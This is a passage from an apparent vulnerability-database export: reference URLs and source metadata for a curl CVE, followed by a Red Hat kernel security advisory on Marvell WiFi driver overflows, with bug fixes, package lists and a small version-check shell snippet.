{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-4658"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1799"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21779"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29623"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27828"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12973"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1871"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30734"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-26926"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24870"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27845"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-1789"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30663"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30799"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3272"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0202"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27824"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22924"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22924"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1354"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5038"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.2/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23440"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13050"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9802"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8771"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30762"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8927"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9895"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8625"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3450"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8812"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8812"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3899"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8819"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3867"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20454"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9893"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8808"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3902"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24407"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25215"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3900"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30761"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8743"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3537"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9805"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8820"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8769"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3449"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9850"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8710"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27781"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8811"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8769"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0055"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9803"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8764"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9862"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27618"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2014-3577"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-3577"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3749"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3885"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15503"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20807"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3326"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-41190"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10018"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14889"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25660"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8835"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-14502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8764"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8844"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3865"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1730"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3864"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15358"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21684"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13627"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14391"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3862"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:0056"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8811"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3901"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-39226"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8823"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3518"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8808"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-15903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3895"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-11793"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000858"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20454"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0532"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8720"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8816"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13627"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8771"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13050"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3897"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8814"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14889"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20843"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8743"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3121"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9915"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8815"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8813"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8625"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8783"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20807"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29361"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-9952"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3517"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20305"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21673"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29363"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3868"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8846"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-3894"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25677"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3521"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.15"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.7"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5079-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/curl/7.74.0-1ubuntu2.3"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25648"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-34558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-29923"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0512"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4914"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25648"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3656"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28950"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3757"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4848"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3620"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33929"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33930"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3733"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4766"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36221"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33928"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33938"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-381421"
},
{
"db": "VULMON",
"id": "CVE-2021-22947"
},
{
"db": "PACKETSTORM",
"id": "165631"
},
{
"db": "PACKETSTORM",
"id": "166714"
},
{
"db": "PACKETSTORM",
"id": "165209"
},
{
"db": "PACKETSTORM",
"id": "166279"
},
{
"db": "PACKETSTORM",
"id": "164171"
},
{
"db": "PACKETSTORM",
"id": "165135"
},
{
"db": "PACKETSTORM",
"id": "165099"
},
{
"db": "PACKETSTORM",
"id": "165053"
},
{
"db": "NVD",
"id": "CVE-2021-22947"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-381421",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-22947",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166714",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165209",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166279",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164171",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165135",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "165053",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-22947",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-09-29T00:00:00",
"db": "VULHUB",
"id": "VHN-381421",
"ident": null
},
{
"date": "2022-01-20T17:48:29",
"db": "PACKETSTORM",
"id": "165631",
"ident": null
},
{
"date": "2022-04-13T22:20:44",
"db": "PACKETSTORM",
"id": "166714",
"ident": null
},
{
"date": "2021-12-09T14:50:37",
"db": "PACKETSTORM",
"id": "165209",
"ident": null
},
{
"date": "2022-03-11T16:38:38",
"db": "PACKETSTORM",
"id": "166279",
"ident": null
},
{
"date": "2021-09-15T15:27:42",
"db": "PACKETSTORM",
"id": "164171",
"ident": null
},
{
"date": "2021-12-03T16:41:45",
"db": "PACKETSTORM",
"id": "165135",
"ident": null
},
{
"date": "2021-11-30T14:44:48",
"db": "PACKETSTORM",
"id": "165099",
"ident": null
},
{
"date": "2021-11-23T17:10:05",
"db": "PACKETSTORM",
"id": "165053",
"ident": null
},
{
"date": "2021-09-29T20:15:08.253000",
"db": "NVD",
"id": "CVE-2021-22947",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-05T00:00:00",
"db": "VULHUB",
"id": "VHN-381421",
"ident": null
},
{
"date": "2024-03-27T15:03:30.377000",
"db": "NVD",
"id": "CVE-2021-22947",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164171"
}
],
"trust": 0.1
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2022-0202-04",
"sources": [
{
"db": "PACKETSTORM",
"id": "165631"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "bypass",
"sources": [
{
"db": "PACKETSTORM",
"id": "165209"
}
],
"trust": 0.1
}
}
VAR-201909-1526
Vulnerability from variot - Updated: 2026-03-09 20:55

There is a heap-based buffer overflow in the Marvell WiFi chip driver in the Linux kernel, in all versions before 5.3, that allows local users to cause a denial of service (system crash) or possibly execute arbitrary code. 7) - aarch64, noarch, ppc64le
Bug Fix(es):
- Kernel panic on job cleanup, related to SyS_getdents64 (BZ#1702057)
- Kernel modules generated incorrectly when system is localized to non-English language (BZ#1705285)
- RHEL-Alt-7.6 - Fixup tlbie vs store ordering issue on POWER9 (BZ#1756270)

7.5) - ppc64, ppc64le, x86_64
Bug Fix(es):
- Slow console output with ast (Aspeed) graphics driver (BZ#1780145)
- core: backports from upstream (BZ#1794373)
- System Crash on vport creation (NPIV on FCoE) (BZ#1796362)
- [GSS] Can't access the mount point due to possible blocking of i/o on rbd (BZ#1796432)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update
Advisory ID:       RHSA-2020:0374-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2020:0374
Issue date:        2020-02-04
CVE Names:         CVE-2019-14816 CVE-2019-14895 CVE-2019-14898
                   CVE-2019-14901 CVE-2019-17133
=====================================================================
- Summary:
An update for kernel is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The kernel packages contain the Linux kernel, the core of any Linux operating system.
Security Fix(es):
- kernel: heap overflow in mwifiex_update_vs_ie() function of Marvell WiFi driver (CVE-2019-14816)
- kernel: heap-based buffer overflow in mwifiex_process_country_ie() function in drivers/net/wireless/marvell/mwifiex/sta_ioctl.c (CVE-2019-14895)
- kernel: heap overflow in marvell/mwifiex/tdls.c (CVE-2019-14901)
- kernel: buffer overflow in cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c (CVE-2019-17133)
- kernel: incomplete fix for race condition between mmget_not_zero()/get_task_mm() and core dumping in CVE-2019-11599 (CVE-2019-14898)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
-
[Azure][7.8] Include patch "PCI: hv: Avoid use of hv_pci_dev->pci_slot after freeing it" (BZ#1766089)
-
[Hyper-V][RHEL7.8] When accelerated networking is enabled on RedHat, network interface(eth0) moved to new network namespace does not obtain IP address. (BZ#1766093)
-
[Azure][RHEL 7.6] hv_vmbus probe pass-through GPU card failed (BZ#1766097)
-
SMB3: Do not error out on large file transfers if server responds with STATUS_INSUFFICIENT_RESOURCES (BZ#1767621)
-
Since RHEL commit 5330f5d09820 high load can cause dm-multipath path failures (BZ#1770113)
-
Hard lockup in free_one_page()->_raw_spin_lock() because sosreport command is reading from /proc/pagetypeinfo (BZ#1770732)
-
patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() (BZ#1772812)
-
fix compat statfs64() returning EOVERFLOW for when _FILE_OFFSET_BITS=64 (BZ#1775678)
-
Guest crash after load cpuidle-haltpoll driver (BZ#1776289)
-
RHEL 7.7 long I/O stalls with bnx2fc from not masking off scope bits of retry delay value (BZ#1776290)
-
Multiple "mv" processes hung on a gfs2 filesystem (BZ#1777297)
-
Moving Egress IP will result in conntrack sessions being DESTROYED (BZ#1779564)
-
core: backports from upstream (BZ#1780033)
-
kernel BUG at arch/powerpc/platforms/pseries/lpar.c:482! (BZ#1780148)
-
Race between tty_open() and flush_to_ldisc() using the tty_struct->driver_data field. (BZ#1780163)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
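The fix ships in kernel-3.10.0-1062.12.1.el7, so after updating and rebooting the running kernel should report that NVR. As a minimal sketch (yum and rpm are the real tools here, and handle this properly), a GNU `sort -V` comparison can tell whether a given version string is older than the fixed one; the `installed` value below is a hypothetical example rather than a real host's `uname -r` output:

```shell
#!/bin/sh
# Sketch: compare a kernel version string against the fixed NVR from this
# advisory using GNU sort -V. "installed" is a hypothetical example value;
# on a real host you would substitute "$(uname -r)".
fixed="3.10.0-1062.12.1.el7"
installed="3.10.0-1062.9.1.el7"

if [ "$installed" = "$fixed" ]; then
  status="up to date"
elif [ "$(printf '%s\n%s\n' "$installed" "$fixed" | sort -V | head -n1)" = "$installed" ]; then
  # installed sorts before fixed, i.e. it is the older version
  status="update required"
else
  status="newer than this advisory"
fi
echo "$status"
```

With the example value above this prints "update required", since 1062.9.1 sorts before 1062.12.1 under version ordering.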
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: kernel-3.10.0-1062.12.1.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm
x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: kernel-3.10.0-1062.12.1.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm
